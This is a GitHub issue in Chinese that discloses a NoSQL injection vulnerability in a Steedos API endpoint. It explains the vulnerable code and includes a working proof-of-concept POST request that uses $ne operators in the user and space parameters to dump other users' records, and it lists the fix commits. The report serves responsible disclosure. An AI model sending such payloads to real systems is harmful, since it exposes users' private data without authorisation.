We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
接口对mongodb nosql操作验证不严,可能导致nosql注入。详细可参考
https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf
大多数接口存在鉴权所以未登录无法利用,这里仅仅举一个例子
漏洞产生原因
例如在 server/packages/steedos_base.js 中,存在如下代码:
JsonRoutes.add("post", "/api/collection/findone", function (req, res, next) { ... if (req.body) { userId = req.body["X-User-Id"]; authToken = req.body["X-Auth-Token"]; } ... model = req.body.model; selector = req.body.selector; options = req.body.options; space = req.body.space; ... space_user = db.space_users.findOne({ user: userId, space: space }); ...
req.body.*可以是一个object,利用$ne等mongodb的query operator https://docs.mongodb.com/manual/reference/operator/query/
构造 X-User-Id[$ne]=1 这样的参数,实际传入的参数就是 {user: {"$ne":"1"},...}
就可以查询任意的space_user并返回用户信息
复现流程
POST /api/collection/findone HTTP/1.1 Host: <**> Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: <**> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 62 X-Auth-Token=1&X-User-Id[$ne]=1&space[$ne]=1&model=space_users
建议:应该在nosql操作前验证参数类型
The text was updated successfully, but these errors were encountered:
Thanks
Sorry, something went wrong.
Mongodb NoSQL 注入问题 #1245
0fabd95
不依赖X-User-Id #1245
1238b8d
Translate
sunhaolin
No branches or pull requests
接口对mongodb nosql操作验证不严,可能导致nosql注入。详细可参考
https://owasp.org/www-pdf-archive/GOD16-NOSQL.pdf
大多数接口存在鉴权所以未登录无法利用,这里仅仅举一个例子
漏洞产生原因
例如在 server/packages/steedos_base.js 中,存在如下代码:
req.body.*可以是一个object,利用$ne等mongodb的query operator
https://docs.mongodb.com/manual/reference/operator/query/
构造 X-User-Id[$ne]=1 这样的参数,实际传入的参数就是 {user: {"$ne":"1"},...}
就可以查询任意的space_user并返回用户信息
复现流程
建议:应该在nosql操作前验证参数类型
The text was updated successfully, but these errors were encountered: